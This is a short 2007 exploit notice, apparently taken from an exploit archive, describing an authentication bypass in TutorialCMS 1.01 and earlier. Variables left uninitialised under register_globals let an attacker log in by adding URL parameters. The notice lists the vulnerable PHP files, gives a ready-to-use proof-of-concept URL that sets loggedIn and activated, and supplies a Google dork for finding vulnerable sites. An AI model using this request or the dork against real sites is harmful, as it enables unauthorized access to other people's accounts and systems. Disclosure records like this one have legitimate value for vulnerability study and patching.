id: 1898
date: 05/20/2007
title: TutorialCMS <= 1.01 Authentication Bypass Vulnerability
author: Silentz
cves: 

=======================================================
TutorialCMS <= 1.01 Authentication Bypass Vulnerability
=======================================================



#################################################################################
#										#
#		     TutorialCMS <= 1.01 Authentication Bypass			#
#										#
# Discovered by: Silentz							#
# Payload: Authentication Bypass						#
# 										#
# Vulnerability:								#
#										#
#	Variables $loggedIn & $activated are not predefined.			#
#										#
# Vulnerable Files:								#
#      										#
#	login.php								#
#	headerLinks.php								#
#	submit1.php								#
#	myFav.php								#
#	userCP.php								#
#										#
#										#
# PoC: http://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1		#
# 										#
# Subject To: register_globals set to on					#
# GoogleDork: "Powered By Photoshop Tutorials" 					#
#										#
# Shoutz: The entire w4ck1ng community						#
#										#
# Notes to developers:								#
#										#
#	You should allways fully disclose the vulnerabilities before someone	#
#       else does, just looks better. Also, try changing the "Date Modified" 	#
#	stamp on the files before you wrap it up for upload ;)			#
#										#
#################################################################################



#  0day.today [2023-03-25]  #